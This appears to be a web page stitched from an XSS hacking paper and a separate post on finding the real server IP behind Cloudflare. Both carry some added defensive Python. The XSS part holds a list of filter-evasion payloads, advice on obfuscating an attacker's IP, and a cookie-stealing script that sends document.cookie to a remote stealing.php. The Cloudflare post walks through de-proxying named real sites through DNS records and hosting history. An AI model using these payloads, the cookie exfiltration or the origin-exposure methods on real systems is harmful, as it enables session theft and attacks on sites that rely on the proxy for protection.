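# Same character set as the PHP pattern in the text: letters, digits, underscore.
ALNUM = re.compile(r"[A-Za-z0-9_]+")

def is_plain_token(value):
    """Allowlist check: True only for non-empty alphanumeric/underscore input."""
    return ALNUM.fullmatch(value) is not None

def render_search(query_string):
    """Reflected case: build the result page for search.php?text=..."""
    # parse_qs percent-decodes, so a hex-encoded payload arrives here in clear.
    text = parse_qs(query_string, keep_blank_values=True).get("text", [""])[0]
    # Encode at output time; quote=True also covers attribute contexts.
    return "<p>Results for: {}</p>".format(html.escape(text, quote=True))

def render_guestbook(messages):
    """Stored case: every saved message is encoded each time it is displayed."""
    items = "".join(
        "<li>{}</li>".format(html.escape(m, quote=True)) for m in messages
    )
    return "<ul>{}</ul>".format(items)

# Constructed sample inputs, shaped like the URLs discussed in the text.
PLAIN = 'text=<script>alert("XSS")</script>'
HEXED = ("text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53"
         "%22%29%3C%2F%73%63%72%69%70%74%3E")

if __name__ == "__main__":
    print(render_search(PLAIN))
    print(render_search(HEXED) == render_search(PLAIN))
    print(render_guestbook(["nice site", "<BODY ONLOAD=alert(document.cookie)>"]))
    print(is_plain_token("kitkat_44"), is_plain_token("<b>"))
```

Encoding belongs at output, in the context where the value is written; the allowlist check is an extra input-side filter for fields that should only ever hold simple tokens.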
-----------------------------------------------------------------------------
[/]
---[ 0x04: Appendix ]
In order to make the attack less suspicious it's possible to "obfuscate" the IP address of the attacker's website, encoding the IP address in one of three formats:
- Dword Address
- Hex Address
- Octal Address
For example the IP address 127.0.0.1 will look like:
- Dword: 2130706433
- Hex: 0x7f.0x00.0x00.0x01
- Octal: 0177.0000.0000.0001
Try for example:
http://0x7f.0x00.0x00.0x01/
And it will open your localhost webserver.
This technique is often used by XSS attackers and, in order to avoid getting caught in an attacker's trap, don't visit websites that don't have a clear domain name (and beware that it is possible to fake that too).
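For link filters and log review, the three spellings above can be reduced to one canonical dotted-quad before any comparison. The following is an added Python example, not part of the original paper; it goes slightly beyond the three formats listed by also accepting the shortened forms (such as 127.1) that the same legacy parsing rules allow, and its function names are assumptions.

```python
import re
from urllib.parse import urlsplit

# One address component: 0x.. is hex, a leading 0 is octal, otherwise decimal.
TOKEN = re.compile(r"0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*")

def _parse(token):
    if token.startswith("0x"):
        return int(token, 16)
    if token.startswith("0"):
        return int(token, 8)
    return int(token, 10)

def canonical_ipv4(host):
    """Return the dotted-quad for any legacy IPv4 spelling, else None."""
    tokens = host.lower().split(".")
    if not 1 <= len(tokens) <= 4:
        return None
    if not all(TOKEN.fullmatch(t) for t in tokens):
        return None
    *lead, last = [_parse(t) for t in tokens]
    # Leading parts are single bytes; the last part fills the remaining bytes.
    if any(n > 255 for n in lead) or last >= 256 ** (4 - len(lead)):
        return None
    value = last
    for i, n in enumerate(lead):
        value |= n << (8 * (3 - i))
    return ".".join(str((value >> s) & 0xFF) for s in (24, 16, 8, 0))

def classify_url(url):
    """Label a URL's host as 'name', 'ip' or 'obfuscated-ip'."""
    host = urlsplit(url).hostname or ""
    ip = canonical_ipv4(host)
    if ip is None:
        return ("name", host)
    return ("ip" if ip == host else "obfuscated-ip", ip)

if __name__ == "__main__":
    # Constructed sample links using the spellings of 127.0.0.1 from the text.
    for link in ("http://2130706433/", "http://0x7f.0x00.0x00.0x01/",
                 "http://0177.0000.0000.0001/", "http://www.example.com/"):
        print(link, classify_url(link))
```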
Here's a list of possible XSS cheats
<IMG SRC="jalert('XSS');">
<IMG SRC=jalert('XSS')>
<IMG
SRC=&#x22;&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x50;&#x4C;&#x41;&#x59;&#x48;
&#x41;&#x43;&#x4B;&#x2E;&#x4E;&#x45;&#x54;&#x27;&#x29;&#x22;>
<IMG SRC="jalert(String.fromCharCode
(88,83,83))">
<SCRIPT/XSS SRC="http://example.com/
xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<iframe src=http://example.com/
scriptlet.html <
<INPUT TYPE="IMAGE" SRC="jalert('XSS');">
<BODY BACKGROUND="jalert('XSS')">
<BODY ONLOAD=alert(document.cookie)>
<IMG DYNSRC="jalert('XSS')">
<IMG DYNSRC="jalert('XSS')">
<BR SIZE="&{alert('XSS')}">
<IMG SRC='vbscript:msgbox("XSS")'>
<TABLE BACKGROUND="jalert('XSS')">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image: url(jalert
('XSS'))">
<STYLE TYPE="text/javascript">alert('XSS');</
STYLE>
<STYLE type="text/css">BODY{background:url
("jalert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<A HREF="jdocument.location='http://
www.example.com/'">XSS</A>
-----------------------------------------------------------------------------
[/]
\======================================
[EOF]=====================================/
# Anonymous_KnW
Cookie Stealing:
<script>window.location=?http://127.0.0.1/
stealing.php?cookie=?+document.cookie</
script>

THANX FOR READING!!!!!!!!

Bypass Cloudflare IP [Get Real IP Address]

06:55 ---

Today I am going to share a few methods I have been using to find the real IP behind Cloudflare. We are going to discuss 4 different methods here.
1-DNS Records And Ping.
For this method we are going to use emillionforum.com as an example.
Code:
emillionforum.com
Using Multiple IP's: 173.245.60.62, 173.245.60.157
Let us scan this site on network-tools.com.
Code:
IP address: 173.245.60.157
Host name: emillionforum.com
Alias: emillionforum.com
173.245.60.157 is from United States (US) in region North America
TraceRoute to 173.245.60.157 [emillionforum.com]
Hop  (ms)  (ms)  (ms)  IP Address       Host name
1    35    0     0     206.123.64.42    -
2    113   124   68    64.124.196.225   xe-4-2-0.er2.dfw2.us.above.net
3    4     3     2     206.223.118.61   equinix.tge9-3.ar1.dfw1.us.nlayer.net
4    0     0     1     69.31.63.182     as13335.xe-4-0-5.ar1.dfw1.us.nlayer.net
5    1     1     2     173.245.60.157   cf-173-245-60-157.cloudflare.com
Trace complete
Retrieving DNS records for emillionforum.com...
DNS servers
hank.ns.cloudflare.com [173.245.59.116]
ruth.ns.cloudflare.com [173.245.58.143]
Answer records
emillionforum.com    NS     hank.ns.cloudflare.com    86400s
emillionforum.com    TXT    v=spf1 a mx include:websitewelcome.com ~all    300s
emillionforum.com    A      173.245.60.157    300s
emillionforum.com    SOA    server: hank.ns.cloudflare.com  email: dns@cloudflare.com  serial: 2012031313  refresh: 10000  retry: 2400  expire: 604800  minimum ttl: 3600    86400s
emillionforum.com    NS     ruth.ns.cloudflare.com    86400s
emillionforum.com    A      173.245.60.62    300s
emillionforum.com    MX     preference: 0  exchange: direct-connect.emillionforum.com    300s
Authority records
Additional records
direct-connect.emillionforum.com    A    174.120.63.195    300s
Through this scan we found a subdomain of emillionforum.com.
Code:
subdomain: direct-connect.emillionforum.com
Let's ping it and see what happens.
Code:
Pinging direct-connect.emillionforum.com [174.120.63.195] with 32 bytes of data:
Reply from 174.120.63.195: bytes=32 time=367ms TTL=44
Reply from 174.120.63.195: bytes=32 time=367ms TTL=44
Reply from 174.120.63.195: bytes=32 time=365ms TTL=44
Reply from 174.120.63.195: bytes=32 time=364ms TTL=44
Ping statistics for 174.120.63.195:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 364ms, Maximum = 367ms, Average = 365ms
So we got another IP now.
Quote: 174.120.63.195
Let's do a reverse lookup on this IP and see where it leads us.
Code:
Found 21 domains hosted on the same web server as 174.120.63.195.
We can see that emillionforum.com is located on this IP. This is the real IP of emillionforum.
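The leak in method 1 is an MX record whose target sits on the unproxied server. A zone owner can check their own records for this before publishing them; the following is an added Python example, not from the original post. The record list is constructed from the scan output above, and the single proxy range is an assumption that covers only the addresses shown there.

```python
import ipaddress

# Assumption: one proxy range, enough for the addresses in the scan above.
# A real audit loads the full range list that the provider publishes.
PROXY_NETS = [ipaddress.ip_network("173.245.48.0/20")]

# Constructed from the DNS answer shown above: (name, type, value).
ZONE = [
    ("emillionforum.com", "A", "173.245.60.157"),
    ("emillionforum.com", "A", "173.245.60.62"),
    ("emillionforum.com", "MX", "direct-connect.emillionforum.com"),
    ("direct-connect.emillionforum.com", "A", "174.120.63.195"),
]

def is_proxied(addr):
    """True when the address belongs to one of the proxy ranges."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in PROXY_NETS)

def find_origin_leaks(zone):
    """Return sorted (name, address, reason) for records exposing an origin."""
    a_records = {}
    for name, rtype, value in zone:
        if rtype == "A":
            a_records.setdefault(name.lower(), []).append(value)
    # Names that other records point at, mapped to the referring record type.
    referenced = {
        value.lower().rstrip("."): rtype
        for _, rtype, value in zone if rtype in ("MX", "CNAME")
    }
    leaks = set()
    for name, addrs in a_records.items():
        for addr in addrs:
            if is_proxied(addr):
                continue
            if name in referenced:
                reason = "target of {} record".format(referenced[name])
            else:
                reason = "direct A record"
            leaks.add((name, addr, reason))
    return sorted(leaks)

if __name__ == "__main__":
    for leak in find_origin_leaks(ZONE):
        print(leak)
```

Any hit means the web origin is reachable around the proxy; moving mail to a separate host and restricting the origin's firewall to the proxy's ranges closes that path.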
2-NetCraft Toolbar (Hosting History)
In some cases we can also use the Netcraft toolbar. Here we are going to take ubers.org as an example.
Code:
http://toolbar.netcraft.com/site_report?url=http://www.ubers.org
It will only work if the site is old and has recently changed to CloudFlare. It is meant to show the "Hosting History" of the scanned site.
Code:
Hosting History
Netblock Owner | IP address | OS | Web Server | Last changed
AltusHost Inc. | 79.142.78.77 | Linux | Apache/2.2.21 Unix mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 | 11-Feb-2012
AltusHost Inc. | 79.142.78.79 | Linux | Apache | 19-Jan-2012
AltusHost Inc. | 79.142.78.79 | Linux | Apache/2.2.21 Unix mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.5 Perl/v5.8.8 | 7-Jan-2012
AltusHost Inc. | 31.3.153.133 | Linux | Apache/2.2.21 Unix mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.8 | 3-Jan-2012
AltusHost Inc. | 31.3.153.133 | Linux | Apache/2.2.21 Unix mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.8 | 23-Dec-2011
AltusHost Inc. | 128.127.110.38 | Linux | LiteSpeed | 19-Dec-2011
AltusHost Inc. | 128.127.110.38 | Linux | LiteSpeed | 2-Dec-2011
3- Using Fierce v0.9.9
We can also use the Fierce v0.9.9 perl script. It won't work every time but it is worth trying. For more details please check this thread.
Code:
https://blackhats.net/0x0/showthread.php?tid=406&pid=1489#pid1489
4-Nmaping-Hosts
This method I came across while searching but I didn't test personally.
For more details read this thread.
Code:
http://calderonpale.com/blog/nmaping-hosts-behind-cloudflares-service
I hope you enjoyed reading it.